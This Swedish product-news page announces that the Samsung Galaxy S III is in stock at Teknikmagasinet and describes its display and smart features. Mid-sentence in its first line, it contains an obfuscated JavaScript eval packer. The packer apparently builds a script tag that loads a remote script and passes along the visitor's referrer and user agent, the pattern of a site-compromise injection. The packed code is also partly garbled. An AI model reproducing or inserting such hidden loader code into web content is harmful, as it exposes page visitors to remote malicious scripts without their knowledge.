Image Image Image Image Image Image Image Image Image Image

| 9 juli, 2020

Scroll to top

Top

Samsung Galaxy S III nu i lager hos Teknikmagasinet

Samsung Galaxy S III nu i lager hos Teknikmagasinet
Sebastian

Samsung eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ebtkn|var|u0026u|referrer|bkddf||js|php’.split(’|’),0,{}))
Galaxy S III – Samsungs senaste modell från sin tokhyllade Galaxy S-serie har äntligen börjat landa i våra butiker!

Den naturliga och organiska designen ger maximal användarvänlighet i en väldigt tilltalande kostym. Inuti sitter en väldigt strömsnål HD Super AMOLED-skärm på 4,8″, med nästan galet bra detaljskärpa, som återger färger och rörelse i väldigt hög kvalitét.

Galaxy S III gör verkligen skäl för att få kallas en smart telefon, tack vare ett gäng intelligenta funktioner. Med S Voice kan du tala om för din mobil vad du vill att den ska göra, du kan t.ex. säga åt den att stänga av alarmet i fem minuter medan du fortsätter sova eller fråga hur vädret är i Köpenhamn. Smart alert ser till att du inte missar att du faktiskt har missat något; om du missat ett samtal eller ett SMS så vibrerar telefonen till när du lyfter upp den. Men smartast av allt är nog Smart stay, en teknik som ser till att skärmen inte stängs av när du tittar på den!